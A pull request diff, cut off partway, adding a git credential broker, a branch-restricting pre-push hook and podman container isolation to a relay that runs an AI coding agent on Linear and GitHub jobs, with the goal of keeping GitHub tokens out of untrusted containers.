### PR TITLE
feat(relay): stage-scoped egress proxy + git credential broker expansion

### DIFF
--- a/packages/ompk-linear-agent/relay/git-hooks/ompk-git-credential
+++ b/packages/ompk-linear-agent/relay/git-hooks/ompk-git-credential
@@ -1,0 +1,78 @@
+#!/bin/sh
+# ompk git credential helper: fetches a fresh GitHub installation token.
+#
+# Two modes of operation, selected by environment variable:
+#
+#   Container mode (OMPK_BROKER_URL set):
+#     Calls the per-job loopback credential broker running on the host.
+#     The broker fetches a JIT token from the Worker without the real token
+#     ever entering the container environment.
+#
+#   Bare mode (OMPK_TOKEN_URL set):
+#     Calls the Worker /github-token endpoint directly using the fence triple.
+#     GH_TOKEN is present in the child env in bare mode (documented as unfenced).
+#
+# Git invokes credential helpers with 'get', 'store', or 'erase' as $1.
+# Only 'get' is handled; store/erase are no-ops (tokens are ephemeral).
+#
+# Outside a relay run (neither variable set) the helper exits 1 so git falls
+# through to the next configured credential helper.
+
+case "$1" in
+  get)
+    if [ -n "$OMPK_BROKER_URL" ]; then
+      # Container mode: call the local per-job credential broker.
+      # The broker validates the fence and fetches a JIT token from the Worker
+      # so the real installation token never appears in the container env.
+      RESPONSE=$(curl -fsS --max-time 15 \
+        "${OMPK_BROKER_URL}/credential?host=github.com" 2>/dev/null)
+      if [ $? -ne 0 ] || [ -z "$RESPONSE" ]; then
+        echo "ompk credential helper: broker credential request failed" >&2
+        exit 1
+      fi
+      # Response is already in git credential format:
+      #   username=x-access-token
+      #   password=<token>
+      printf '%s\n' "$RESPONSE"
+
+    elif [ -n "$OMPK_TOKEN_URL" ]; then
+      # Bare mode: fetch JIT token from the Worker directly.
+      if [ -z "$OMPK_FENCE_JOB" ] || [ -z "$OMPK_FENCE_ATTEMPT" ] || [ -z "$OMPK_FENCE_TOKEN" ]; then
+        echo "ompk credential helper: incomplete fence environment; cannot fetch JIT token" >&2
+        exit 1
+      fi
+
+      BODY="{\"jobId\":\"$OMPK_FENCE_JOB\",\"attemptId\":\"$OMPK_FENCE_ATTEMPT\",\"leaseToken\":\"$OMPK_FENCE_TOKEN\"}"
+
+      RESPONSE=$(curl -fsS --max-time 15 \
+        -X POST \
+        -H "Content-Type: application/json" \
+        -d "$BODY" \
+        "$OMPK_TOKEN_URL" 2>/dev/null)
+
+      if [ $? -ne 0 ] || [ -z "$RESPONSE" ]; then
+        echo "ompk credential helper: JIT token fetch failed" >&2
+        exit 1
+      fi
+
+      # Extract the token value from {"token":"ghs_..."}.
+      # GitHub installation tokens contain only [A-Za-z0-9_] so sed is safe.
+      TOKEN=$(printf '%s' "$RESPONSE" | sed 's/.*"token":"\([^"]*\)".*/\1/')
+
+      if [ -z "$TOKEN" ] || [ "$TOKEN" = "$RESPONSE" ]; then
+        echo "ompk credential helper: could not parse token from Worker response" >&2
+        exit 1
+      fi
+
+      printf 'username=x-access-token\npassword=%s\n' "$TOKEN"
+
+    else
+      # Outside a relay run: no-op, let git fall through to next helper.
+      exit 1
+    fi
+    ;;
+
+  store | erase)
+    # Ephemeral tokens are never cached locally.
+    ;;
+esac

--- a/packages/ompk-linear-agent/relay/git-hooks/pre-push
+++ b/packages/ompk-linear-agent/relay/git-hooks/pre-push
@@ -1,11 +1,14 @@
 #!/bin/sh
 # ompk fence guard: blocks pushes from runners whose queue lease is no
 # longer current (superseded attempt, resolved reconcile, terminal job).
+# In broker mode (OMPK_BROKER_URL set), also enforces push-to-ompk/*-only
+# branch naming so a compromised container cannot push to main or other
+# protected refs.
 #
 # Installed for relay-spawned children via a GIT_CONFIG_* core.hooksPath
 # override; the fence triple arrives in the environment. Outside a relay
 # run (no OMPK_FENCE_URL) the guard is a no-op so the hooks directory is
-# safe to reuse.
+# safe to reference from .gitconfig in development.
 #
 # Fail-closed on network errors: a partitioned runner cannot verify its
 # lease, and a partitioned runner is exactly the double-writer this guard
@@ -18,6 +21,26 @@ if [ -z "$OMPK_FENCE_JOB" ] || [ -z "$OMPK_FENCE_ATTEMPT" ] || [ -z "$OMPK_FENCE
 	exit 1
 fi
 
+# Broker mode: enforce push-to-ompk/*-only branch naming.
+# Reads refspecs from stdin (git pre-push protocol):
+#   <local-ref> <local-sha1> <remote-ref> <remote-sha1>
+# Each remote-ref must be under refs/heads/ompk/. This runs before any
+# network connection, so a rejected push never reaches the remote.
+if [ -n "$OMPK_BROKER_URL" ]; then
+	while IFS=' ' read -r _local_ref _local_sha remote_ref _remote_sha; do
+		[ -z "$remote_ref" ] && continue
+		case "$remote_ref" in
+			refs/heads/ompk/*)
+				;;
+			*)
+				echo "ompk fence guard: push to '${remote_ref}' rejected: only refs/heads/ompk/* is permitted in container mode" >&2
+				exit 1
+				;;
+		esac
+	done
+fi
+
+# Fence check: validate the queue lease is still current with the Worker.
 body="{\"jobId\":\"$OMPK_FENCE_JOB\",\"attemptId\":\"$OMPK_FENCE_ATTEMPT\",\"leaseToken\":\"$OMPK_FENCE_TOKEN\"}"
 
 if curl -fsS --max-time 10 -X POST -H "Content-Type: application/json" \

--- a/packages/ompk-linear-agent/relay/relay.ts
+++ b/packages/ompk-linear-agent/relay/relay.ts
@@ -1,22 +1,58 @@
 #!/usr/bin/env bun
 /**
- * Windows-side relay for the ompk Linear agent.
+ * Relay for the ompk Linear agent.
  *
  * Long-polls the Cloudflare Worker for queued jobs, runs each one through the
  * local `omp` CLI in headless mode (`--print --yolo --model <combo>`), and
  * posts the result back so the Worker can comment on the Linear issue.
  *
- * Security invariants:
- * - The child process is spawned WITHOUT a shell. The prompt and model are
- *   passed as literal argv entries, and the prompt rides behind a `--`
- *   positional separator, so Linear-controlled text can never be parsed as
- *   shell syntax or as `omp` flags.
- * - Jobs are executed only when their model is on the operator-configured
- *   allowlist (`OMPK_RELAY_MODELS`); everything else is reported back as a
- *   failure without spawning anything.
- * - Completions carry the lease fencing identity (`attemptId` + `leaseToken`)
- *   issued by the Worker's queue, so a stale relay cannot overwrite a newer
- *   attempt.
+ * Concurrency model
+ * -----------------
+ * Up to MAX_CONCURRENT_JOBS (default 2) jobs execute in parallel. A per-repo
+ * mutex serializes jobs that target the same GitHub repository so no two
+ * attempts race on the same workspace or mirror cache. Linear-sourced jobs
+ * are keyed by issueId and effectively serialize per issue.
+ *
+ * GitHub workspace isolation
+ * --------------------------
+ * Each GitHub job gets a private clone in GITHUB_WORKSPACE_ROOT/<job-id>/,
+ * deleted on completion. A bare mirror cache under .mirrors/ speeds up clones
+ * and is lock-protected per mirror path.
+ *
+ * Container isolation
+ * -------------------
+ * When OMPK_RELAY_CONTAINER_IMAGE is set, each job phase runs inside a
+ * per-phase podman container. The agent phase uses a Git credential broker
+ * (loopback HTTP server, one per job) so the GitHub installation token never
+ * enters the container environment or logs. The broker also enforces
+ * push-to-ompk/*-branches-only; the pre-push hook reads OMPK_BROKER_URL and
+ * validates remote refs before any push is allowed.
+ *
+ * NOTE: Per-job podman network + CONNECT proxy (egress allow-listing by phase)
+ * are tracked in issue #41 as a follow-up. Currently containers run with
+ * --network=host; the broker limits token exposure but outbound egress is still
+ * unrestricted. The acceptance criterion "agent phase cannot reach arbitrary
+ * hosts" requires the follow-up proxy implementation.
+ *
+ * Just-in-time publish token
+ * --------------------------
+ * Instead of carrying the lease-time installation token all the way to push
+ * time, a relay-shipped git credential helper fetches a fresh token at push
+ * time. In bare mode the helper calls the Worker /github-token endpoint
+ * directly. In container mode the helper calls the local credential broker,
+ * which in turn calls the Worker, so the real token never enters the container.
+ *
+ * Security invariants
+ * -------------------
+ * - Children are spawned WITHOUT a shell.
+ * - Only allowlisted models are dispatched.
+ * - Completions are fenced (attemptId + leaseToken).
+ * - The relay bearer token NEVER crosses the child process boundary; only
+ *   the unguessable fence triple is exposed to the untrusted runner env.
+ * - In container mode: GH_TOKEN never enters the container env or job output;
+ *   git credentials are brokered via a per-job loopback service.
+ * - Bare (non-container) mode keeps the current GH_TOKEN behaviour and is
+ *   documented as unfenced with respect to network egress.
  *
  * Usage:
  *   WORKER_URL=https://ompk-linear-agent.pkkidking.workers.dev \
@@ -26,24 +62,57 @@
  */
 
 import { type ChildProcess, spawn } from "node:child_process";
+import { mkdir, rm } from "node:fs/promises";
 import { hostname } from "node:os";
+import { dirname, join } from "node:path";
 import { fileURLToPath } from "node:url";
 
 const WORKER_URL = process.env.WORKER_URL ?? "https://ompk-linear-agent.pkkidking.workers.dev";
 const RELAY_TOKEN = process.env.RELAY_TOKEN;
 const RELAY_NAME = process.env.RELAY_NAME ?? hostname();
 const WORKSPACE_DIR = process.env.OMPK_RELAY_WORKSPACE ?? process.cwd();
+const GITHUB_WORKSPACE_ROOT =
+	process.env.OMPK_RELAY_GITHUB_ROOT ?? join(WORKSPACE_DIR, "github-workspaces");
 const POLL_INTERVAL_MS = Number(process.env.OMPK_RELAY_POLL_MS ?? 5000);
+/**
+ * Per-job execution timeout. With JIT token refresh enabled (credential
+ * helper + /github-token), this can safely be raised to 45–50 min without
+ * risking push failures due to expired installation tokens.
+ */
 const JOB_TIMEOUT_MS = Number(process.env.OMPK_RELAY_JOB_TIMEOUT_MS ?? 30 * 60 * 1000);
 /**
- * Executable dispatched for each job. Resolved from PATH by CreateProcess /
- * execvp without any shell; override with an absolute path when `omp` is
- * installed behind a .cmd shim that direct spawn cannot resolve.
+ * Executable dispatched for each job. Resolved from PATH by execvp without
+ * any shell; override with an absolute path when `omp` is installed behind a
+ * .cmd shim that direct spawn cannot resolve.
  */
 const OMP_BIN = process.env.OMPK_RELAY_OMP_BIN ?? "omp";
+/**
+ * Maximum concurrent jobs. Two slots, never the same repo simultaneously.
+ * Raise only when the host has matching CPU/memory headroom.
+ */
+const MAX_CONCURRENT_JOBS = Number(process.env.OMPK_RELAY_MAX_JOBS ?? 2);
+
+// ─── Container configuration ──────────────────────────────────────────────────
+
+/**
+ * When set, the agent and setup phases each run inside a per-phase podman
+ * container of this image. Absent → bare mode (unfenced egress).
+ */
+const CONTAINER_IMAGE = process.env.OMPK_RELAY_CONTAINER_IMAGE?.trim();
+const CONTAINER_BIN = process.env.OMPK_RELAY_CONTAINER_BIN ?? "podman";
+const CONTAINER_MEMORY = process.env.OMPK_RELAY_CONTAINER_MEMORY ?? "4g";
+const CONTAINER_PIDS_LIMIT = 2048;
+/** Timeout for the repo-declared .ompk/setup.sh phase. */
+const SETUP_TIMEOUT_MS = Number(process.env.OMPK_RELAY_SETUP_TIMEOUT_MS ?? 10 * 60 * 1000);
+const CONTAINER_HOME = "/tmp/ompk-home";
+const CONTAINER_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
+/** Path inside the container where the host git-hooks directory is bind-mounted. */
+const CONTAINER_GIT_HOOKS_DIR = "/opt/ompk/git-hooks";
 
 export interface Job {
 	id: string;
+	/** Origin system: "linear" (default) or "github" PR/issue. */
+	source?: "linear" | "github";
 	issueId: string;
 	issueIdentifier: string;
 	model: string;
@@ -52,6 +121,18 @@ export interface Job {
 	createdAt: string;
 	attemptId: string;
 	leaseToken: string;
+	/** GitHub repository context for GitHub-sourced jobs. */
+	github?: {
+		owner: string;
+		repo: string;
+		number: number;
+		headRef?: string;
+		defaultBranch: string;
+		/** GitHub App installation ID — avoids an API round-trip at JIT-token time. */
+		installationId: number;
+	};
+	/** Ephemeral installation token returned only in the poll response. */
+	githubToken?: string;
 	/** Heartbeat cadence the Worker expects; two missed beats park the job. */
 	heartbeatMs?: number;
 }
@@ -63,8 +144,8 @@ export interface JobRunResult {
 	/**
 	 * Retry taxonomy: `transient` failures (timeout, spawn error, model not
 	 * runnable on THIS relay) may be requeued with backoff by the queue;
-	 * `permanent` (non-zero omp exit — deterministic by default) is
-	 * terminal. Successes carry no class.
+	 * `permanent` (non-zero omp exit — deterministic by default) is terminal.
+	 * Successes carry no class.
 	 */
 	failureClass?: "transient" | "permanent";
 }
@@ -88,13 +169,25 @@ export function buildOmpArgs(model: string, prompt: string): string[] {
 export type SpawnFn = (
 	command: string,
 	args: readonly string[],
-	options: { cwd: string; shell?: false; env?: NodeJS.ProcessEnv },
+	options: { cwd: string; shell?: false; env?: NodeJS.ProcessEnv; detached?: boolean },
 ) => ChildProcess;
 
 export interface RunHooks {
 	onSpawn?: (child: ChildProcess) => void;
 	/** Full child environment (replaces, not merges; spread process.env in). */
 	env?: NodeJS.ProcessEnv;
+	/** Working directory override. Defaults to WORKSPACE_DIR. */
+	cwd?: string;
+	/** Command override — used to replace OMP_BIN with the container runtime. */
+	command?: string;
+	/** Argv override — used to replace buildOmpArgs output with container args. */
+	args?: readonly string[];
+	/** Non-zero exit failure class. Container runtime exits are transient. */
+	nonZeroFailureClass?: "transient" | "permanent";
+	/** Async cleanup called on timeout before resolving; replaces the default kill(). */
+	onTimeout?: () => Promise<void>;
+	/** Detach the child into its own process group (for clean SIGKILL of trees). */
+	detached?: boolean;
 }
 
 /** Runs the job's prompt through `omp` headlessly — argv only, no shell. */
@@ -106,38 +199,61 @@ export function runOmp(
 	hooks: RunHooks = {},
 ): Promise<JobRunResult> {
 	const { promise, resolve } = Promise.withResolvers<JobRunResult>();
-	const child = spawnImpl(OMP_BIN, buildOmpArgs(model, prompt), {
-		cwd: WORKSPACE_DIR,
+	const child = spawnImpl(hooks.command ?? OMP_BIN, hooks.args ?? buildOmpArgs(model, prompt), {
+		cwd: hooks.cwd ?? WORKSPACE_DIR,
 		...(hooks.env ? { env: hooks.env } : {}),
+		...(hooks.detached !== undefined ? { detached: hooks.detached } : {}),
 	});
 	hooks.onSpawn?.(child);
 
 	let stdout = "";
 	let stderr = "";
+	let timedOut = false;
+	const timeoutResult = (): JobRunResult => ({
+		success: false,
+		output: stdout,
+		error: `timed out after ${timeoutMs}ms`,
+		failureClass: "transient",
+	});
 	const timer = setTimeout(() => {
+		timedOut = true;
+		if (hooks.onTimeout) {
+			void hooks
+				.onTimeout()
+				.catch(() => undefined)
+				.then(() => resolve(timeoutResult()));
+			return;
+		}
 		child.kill();
-		resolve({ success: false, output: stdout, error: `timed out after ${timeoutMs}ms`, failureClass: "transient" });
+		resolve(timeoutResult());
 	}, timeoutMs);
 
-	child.stdout?.on("data", d => {
+	child.stdout?.on("data", (d: Buffer) => {
 		stdout += d.toString();
 	});
-	child.stderr?.on("data", d => {
+	child.stderr?.on("data", (d: Buffer) => {
 		stderr += d.toString();
 	});
-	child.on("error", err => {
+	child.on("error", (err: Error) => {
 		clearTimeout(timer);
+		if (timedOut && hooks.onTimeout) return;
 		resolve({ success: false, output: stdout, error: err.message, failureClass: "transient" });
 	});
-	child.on("close", code => {
+	child.on("close", (code: number | null) => {
 		clearTimeout(timer);
+		if (timedOut && hooks.onTimeout) return;
 		if (code === 0) {
 			resolve({ success: true, output: stdout });
 			return;
 		}
 		// A clean non-zero exit is deterministic until proven otherwise:
 		// retrying a failing contract burns tokens without new information.
-		resolve({ success: false, output: stdout, error: stderr || `exit code ${code}`, failureClass: "permanent" });
+		resolve({
+			success: false,
+			output: stdout,
+			error: stderr || `exit code ${code}`,
+			failureClass: hooks.nonZeroFailureClass ?? "permanent",
+		});
 	});
 	return promise;
 }
@@ -165,6 +281,8 @@ export async function executeJob(
 	}
 	return runOmp(job.model, job.prompt, spawnImpl, timeoutMs, hooks);
 }
+
+// ─── Network helpers ──────────────────────────────────────────────────────────
 
 function authHeaders(token: string): Record<string, string> {
 	return { Authorization: `Bearer ${token}` };
@@ -231,7 +349,11 @@ async function announceStartup(token: string): Promise<void> {
 			console.error(`startup reconcile sweep skipped: ${res.status} ${await res.text()}`);
 			return;
 		}
-		const summary = (await res.json()) as { resolved?: number; requeued?: number; deadLettered?: number };
+		const summary = (await res.json()) as {
+			resolved?: number;
+			requeued?: number;
+			deadLettered?: number;
+		};
 		if (summary.resolved) {
 			console.log(
 				`startup reconcile sweep: ${summary.resolved} job(s) resolved (${summary.requeued ?? 0} requeued, ${summary.deadLettered ?? 0} dead-lettered)`,
@@ -242,63 +364,1020 @@ async function announceStartup(token: string): Promise<void> {
 	}
 }
 
-/** Hooks directory shipped next to the relay; contains the pre-push fence guard. */
+// ─── Git hooks and credential helper paths ────────────────────────────────────
+
+/** Hooks directory shipped next to the relay; contains the pre-push fence guard and credential helper. */
 const GIT_HOOKS_DIR = fileURLToPath(new URL("git-hooks/", import.meta.url)).replace(/[\\/]+$/, "");
 
 /**
- * Child environment for one attempt: the fence triple (the pre-push guard's
- * credential — never the relay bearer token) plus a `core.hooksPath`
- * override injected through GIT_CONFIG_* so every git invocation in the
- * child tree runs the fence guard. The override shadows repo-local hooks
- * for the child, which is intended for a headless runner workspace.
+ * Relay-shipped git credential helper. Called by git when it needs credentials
+ * for github.com; in bare mode it fetches a JIT token from the Worker, in
+ * container mode it calls the local credential broker instead.
  */
-function fenceEnv(job: Job): NodeJS.ProcessEnv {
+const CREDENTIAL_HELPER = join(GIT_HOOKS_DIR, "ompk-git-credential");
+
+// ─── Mutex primitives ─────────────────────────────────────────────────────────
+
+/**
+ * Map keyed by resource identifier to the Promise that resolves when the
+ * resource is free. Each key tracks the last registered waiter; callers
+ * form an implicit chain without a queue data structure.
+ */
+export type MutexMap = Map<string, Promise<void>>;
+
+/**
+ * Serialize access to a named resource. Concurrent callers with the same key
+ * wait in FIFO order; a throwing `fn` does not block later callers (the lock
+ * is released in `finally`).
+ *
+ * @param map  Shared map that tracks in-flight operations per key.
+ * @param key  Resource identifier (e.g. "owner/repo" or an absolute path).
+ * @param fn   Work to perform while holding the lock.
+ */
+export function withLock<T>(map: MutexMap, key: string, fn: () => Promise<T>): Promise<T> {
+	const prior = map.get(key) ?? Promise.resolve();
+	let unlock!: () => void;
+	const gate = new Promise<void>(r => {
+		unlock = r;
+	});
+	map.set(key, gate);
+	return (async () => {
+		await prior;
+		try {
+			return await fn();
+		} finally {
+			// Only the last registered caller owns the map slot; earlier callers
+			// have already been superseded and must not delete a later entry.
+			if (map.get(key) === gate) map.delete(key);
+			unlock();
+		}
+	})();
+}
+
+/**
+ * Per-repo mutex: serializes jobs targeting the same GitHub repository so
+ * their workspaces and mirror cache never overlap.
+ */
+const repoLocks: MutexMap = new Map();
+
+/**
+ * Per-mirror-path mutex: serializes mirror fetch/update operations for the
+ * same bare clone. Belt-and-suspenders: the per-repo mutex already prevents
+ * same-repo jobs from overlapping, but the explicit per-mirror lock makes the
+ * invariant visible at the call site and guards against future refactors.
+ */
+const mirrorLocks: MutexMap = new Map();
+
+// ─── Container support ────────────────────────────────────────────────────────
+
+/**
+ * Env keys from the fence environment that are forwarded into the agent
+ * container. GH_TOKEN is intentionally absent: the credential broker serves
+ * github.com credentials so the real token never enters the container env.
+ */
+const CONTAINER_AGENT_ENV_KEYS = [
+	"OMPK_FENCE_URL",
+	"OMPK_FENCE_JOB",
+	"OMPK_FENCE_ATTEMPT",
+	"OMPK_FENCE_TOKEN",
+	"GIT_CONFIG_KEY_0",   // always "core.hooksPath"
+	"GIT_CONFIG_VALUE_0", // host path — overridden to CONTAINER_GIT_HOOKS_DIR below
+] as const;
+
+/**
+ * Host env keys forwarded into the setup-hook container. These are system
+ * basics only; no tokens or relay secrets cross this boundary.
+ */
+const SETUP_ENV_KEYS = [
+	"PATH",
+	"HOME",
+	"TMPDIR",
+	"TEMP",
+	"TMP",
+	"LANG",
+	"LC_ALL",
+	"SHELL",
+	"USER",
+	"USERNAME",
+	"SYSTEMROOT",
+	"WINDIR",
+	"COMSPEC",
+	"PATHEXT",
+	"HTTP_PROXY",
+	"HTTPS_PROXY",
+	"NO_PROXY",
+	"http_proxy",
+	"https_proxy",
+	"no_proxy",
+] as const;
+
+export interface ContainerRunOptions {
+	image: string;
+	memory?: string;
+	pidsLimit?: number;
+	path?: string;
+	home?: string;
+	gitHooksDir?: string;
+	name?: string;
+}
+
+function appendContainerEnv(args: string[], env: NodeJS.ProcessEnv): void {
+	for (const [key, value] of Object.entries(env)) {
+		if (value !== undefined) args.push("--env", `${key}=${value}`);
+	}
+}
+
+function buildContainerBaseArgs(
+	workspace: string,
+	env: NodeJS.ProcessEnv,
+	options: ContainerRunOptions,
+	mountGitHooks: boolean,
+): string[] {
+	const home = options.home ?? CONTAINER_HOME;
+	const args = [
+		"run",
+		"--rm",
+		"--volume",
+		`${workspace}:/workspace:Z`,
+		"--workdir",
+		"/workspace",
+		"--tmpfs",
+		`${home}:rw,mode=700`,
+		// TODO(#41 follow-up): Replace --network=host with a per-job podman
+		// network routed through the CONNECT proxy so the agent phase can only
+		// reach the Anthropic API and the local credential broker.
+		"--network=host",
+		"--http-proxy=false",
+		"--memory",
+		options.memory ?? CONTAINER_MEMORY,
+		"--pids-limit",
+		String(options.pidsLimit ?? CONTAINER_PIDS_LIMIT),
+	];
+	if (options.name) args.push("--name", options.name);
+	if (mountGitHooks) {
+		args.push("--volume", `${options.gitHooksDir ?? GIT_HOOKS_DIR}:${CONTAINER_GIT_HOOKS_DIR}:ro,z`);
+	}
+	appendContainerEnv(args, env);
+	args.push(options.image);
+	return args;
+}
+
+export function deriveContainerName(jobId: string, attemptId: string, phase: "setup" | "agent"): string {
+	const safe = `${jobId}-${attemptId}`.replace(/[^A-Za-z0-9_.-]/g, "_").slice(0, 120);
+	return `ompk-${safe}-${phase}`;
+}
+
+/**
+ * Build a podman-compatible container argv for the untrusted agent phase.
+ *
+ * Security: GH_TOKEN is never placed in the container env. When a broker URL
+ * is provided, the container's git credential helper is pointed at the local
+ * broker instead, which issues JIT tokens without the container ever seeing
+ * the underlying installation token.
+ */
+export function buildContainerArgs(
+	job: Pick<Job, "model" | "prompt" | "source">,
+	workspace: string,
+	env: NodeJS.ProcessEnv,
+	options: ContainerRunOptions,
+	brokerUrl?: string,
+): string[] {
+	const containerEnv: NodeJS.ProcessEnv = {
+		PATH: options.path ?? CONTAINER_PATH,
+		HOME: options.home ?? CONTAINER_HOME,
+	};
+
+	// Copy fence vars and the core.hooksPath git config key from the host env.
+	for (const key of CONTAINER_AGENT_ENV_KEYS) {
+		const value = env[key];
+		if (value !== undefined) containerEnv[key] = value;
+	}
+
+	// core.hooksPath must point to the container-internal hooks directory, not
+	// the host path that fenceEnv() emits.
+	if (containerEnv.GIT_CONFIG_VALUE_0 !== undefined) {
+		containerEnv.GIT_CONFIG_VALUE_0 = CONTAINER_GIT_HOOKS_DIR;
+	}
+
+	if (job.source === "github" && brokerUrl) {
+		// Broker mode: the credential helper inside the container calls the
+		// local broker instead of the Worker directly. The real token stays on
+		// the host. GH_TOKEN is never set in the container env.
+		containerEnv.OMPK_BROKER_URL = brokerUrl;
+		containerEnv.GIT_CONFIG_COUNT = "2";
+		containerEnv.GIT_CONFIG_KEY_1 = "credential.helper";
+		containerEnv.GIT_CONFIG_VALUE_1 = `${CONTAINER_GIT_HOOKS_DIR}/ompk-git-credential`;
+	} else {
+		containerEnv.GIT_CONFIG_COUNT = "1";
+	}
+
+	return [
+		...buildContainerBaseArgs(workspace, containerEnv, options, true),
+		"omp",
+		...buildOmpArgs(job.model, job.prompt),
+	];
+}
+
+/** Environment for the repo-declared setup hook: system basics, never tokens. */
+export function buildSetupHookEnv(source: NodeJS.ProcessEnv = process.env): NodeJS.ProcessEnv {
+	const env: NodeJS.ProcessEnv = {};
+	for (const key of SETUP_ENV_KEYS) {
+		const value = source[key];
+		if (value !== undefined) env[key] = value;
+	}
+	return env;
+}
+
+function buildContainerSetupArgs(
+	workspace: string,
+	env: NodeJS.ProcessEnv,
+	options: ContainerRunOptions,
+): string[] {
+	const containerEnv: NodeJS.ProcessEnv = {
+		...env,
+		PATH: options.path ?? CONTAINER_PATH,
+		HOME: options.home ?? CONTAINER_HOME,
+	};
+	// Setup hooks run without git-hooks (no fence guard needed; no pushes).
+	return [...buildContainerBaseArgs(workspace, containerEnv, options, false), "bash", ".ompk/setup.sh"];
+}
+
+export type HookExistsFn = (path: string) => Promise<boolean>;
+
+export interface SetupHookRunOptions {
+	spawn?: SpawnFn;
+	timeoutMs?: number;
+	env?: NodeJS.ProcessEnv;
+	hookExists?: HookExistsFn;
+	onSpawn?: (child: ChildProcess) => void;
+	command?: string;
+	args?: readonly string[];
+	redactionToken?: string;
+	nonZeroFailureClass?: "transient" | "permanent";
+	onTimeout?: () => Promise<void>;
+}
+
+const SETUP_OUTPUT_LIMIT = 4096;
+
+function setupFailureOutput(captured: string, wasTruncated: boolean): string {
+	return wasTruncated ? `${captured}\n...[truncated]` : captured;
+}
+
+function forceKillChildTree(child: ChildProcess): void {
+	if (process.platform !== "win32" && child.pid !== undefined) {
+		try {
+			process.kill(-child.pid, "SIGKILL");
+			return;
+		} catch {
+			// Fall through when the child exited before its process group was set.
+		}
+	}
+	child.kill("SIGKILL");
+}
+
+/**
+ * Run a repo-declared setup hook when present. Success or missing hook
+ * returns undefined; failures return a ready-to-submit job result.
+ */
+export async function runSetupHook(
+	workspace: string,
+	options: SetupHookRunOptions = {},
+): Promise<JobRunResult | undefined> {
+	const hookPath = join(workspace, ".ompk", "setup.sh");
+	const hookExists = options.hookExists ?? (path => Bun.file(path).exists());
+	if (!(await hookExists(hookPath))) return undefined;
+
+	const spawnImpl = options.spawn ?? spawn;
+	const timeoutMs = options.timeoutMs ?? SETUP_TIMEOUT_MS;
+	const command = options.command ?? "bash";
+	const args = options.args ?? [".ompk/setup.sh"];
+
+	let child: ChildProcess;
+	try {
+		child = spawnImpl(command, args, {
+			cwd: workspace,
+			env: options.env ?? buildSetupHookEnv(),
+			detached: process.platform !== "win32",
+		});
+	} catch (err) {
+		return {
+			success: false,
+			output: "",
+			error: `setup hook .ompk/setup.sh failed to start: ${err instanceof Error ? err.message : String(err)}`,
+			failureClass: "transient",
+		};
+	}
+	options.onSpawn?.(child);
+
+	const { promise, resolve } = Promise.withResolvers<JobRunResult | undefined>();
+	let captured = "";
+	let pending = "";
+	let outputTruncated = false;
+	let timedOut = false;
+
+	const appendCaptured = (text: string): void => {
+		const remaining = SETUP_OUTPUT_LIMIT - captured.length;
+		if (remaining <= 0) {
+			if (text.length > 0) outputTruncated = true;
+			return;
+		}
+		captured += text.slice(0, remaining);
+		if (text.length > remaining) outputTruncated = true;
+	};
+	const capture = (data: unknown): void => {
+		pending += String(data);
+		const secret = options.redactionToken;
+		if (!secret) {
+			appendCaptured(pending);
+			pending = "";
+			return;
+		}
+		for (;;) {
+			const secretIndex = pending.indexOf(secret);
+			if (secretIndex >= 0) {
+				appendCaptured(pending.slice(0, secretIndex));
+				appendCaptured("[redacted]");
+				pending = pending.slice(secretIndex + secret.length);
+				continue;
+			}
+			const safeLength = Math.max(0, pending.length - (secret.length - 1));
+			appendCaptured(pending.slice(0, safeLength));
+			pending = pending.slice(safeLength);
+			return;
+		}
+	};
+	const flushPending = (): void => {
+		const secret = options.redactionToken;
+		if (secret && pending.length > 0) {
+			let prefixLength = Math.min(secret.length - 1, pending.length);
+			while (prefixLength > 0 && !secret.startsWith(pending.slice(-prefixLength))) prefixLength -= 1;
+			appendCaptured(pending.slice(0, pending.length - prefixLength));
+			if (prefixLength > 0) appendCaptured("[redacted]");
+		} else {
+			appendCaptured(pending);
+		}
+		pending = "";
+	};
+	const failureOutput = (): string => {
+		flushPending();
+		return setupFailureOutput(captured, outputTruncated);
+	};
+	const timeoutResult = (): JobRunResult => ({
+		success: false,
+		output: failureOutput(),
+		error: `setup hook .ompk/setup.sh timed out after ${timeoutMs}ms`,
+		failureClass: "transient",
+	});
+
+	const timer = setTimeout(() => {
+		timedOut = true;
+		if (options.onTimeout) {
+			void options
+				.onTimeout()
+				.catch(() => undefined)
+				.then(() => resolve(timeoutResult()));
+			return;
+		}
+		forceKillChildTree(child);
+	}, timeoutMs);
+
+	child.stdout?.on("data", capture);
+	child.stderr?.on("data", capture);
+	child.on("error", (err: Error) => {
+		clearTimeout(timer);
+		if (timedOut) {
+			if (!options.onTimeout) resolve(timeoutResult());
+			return;
+		}
+		resolve({
+			success: false,
+			output: failureOutput(),
+			error: `setup hook .ompk/setup.sh failed to start: ${err.message}`,
+			failureClass: "transient",
+		});
+	});
+	child.on("close", (code: number | null) => {
+		clearTimeout(timer);
+		if (timedOut) {
+			if (!options.onTimeout) resolve(timeoutResult());
+			return;
+		}
+		if (code === 0) {
+			resolve(undefined);
+			return;
+		}
+		resolve({
+			success: false,
+			output: failureOutput(),
+			error: `setup hook .ompk/setup.sh failed with exit code ${code}`,
+			failureClass: options.nonZeroFailureClass ?? "permanent",
+		});
+	});
+	return promise;
+}
+
+async function forceRemoveContainer(name: string): Promise<void> {
+	const subprocess = Bun.spawn([CONTAINER_BIN, "rm", "--force", name], {
+		env: process.env,
+		stdout: "ignore",
+		stderr: "pipe",
+	});
+	const exitCode = await subprocess.exited;
+	if (exitCode !== 0) {
+		const errorText = subprocess.stderr ? await new Response(subprocess.stderr).text() : "";
+		throw new Error(`container cleanup failed: ${errorText.trim() || `exit code ${exitCode}`}`);
+	}
+}
+
+async function stopNamedContainer(name: string, runtimeChild: ChildProcess | undefined): Promise<void> {
+	if (runtimeChild) forceKillChildTree(runtimeChild);
+	let lastError: unknown;
+	for (let attempt = 0; attempt < 2; attempt += 1) {
+		try {
+			await forceRemoveContainer(name);
+			return;
+		} catch (err) {
+			lastError = err;
+			if (attempt === 0) await Bun.sleep(100);
+		}
+	}
+	throw lastError instanceof Error ? lastError : new Error("container cleanup failed");
+}
+
+// ─── Git credential broker ────────────────────────────────────────────────────
+
+/**
+ * Handle returned by startGitBroker. The url is a loopback address reachable
+ * from containers running with --network=host.
+ */
+export interface GitBrokerHandle {
+	/** http://127.0.0.1:<port> — set as OMPK_BROKER_URL in the container env. */
+	url: string;
+	/** Shut down the broker server. Call in the job's finally block. */
+	stop: () => Promise<void>;
+}
+
+/** Options for startGitBroker. fetchImpl is injected by tests. */
+export interface GitBrokerOptions {
+	jobId: string;
+	attemptId: string;
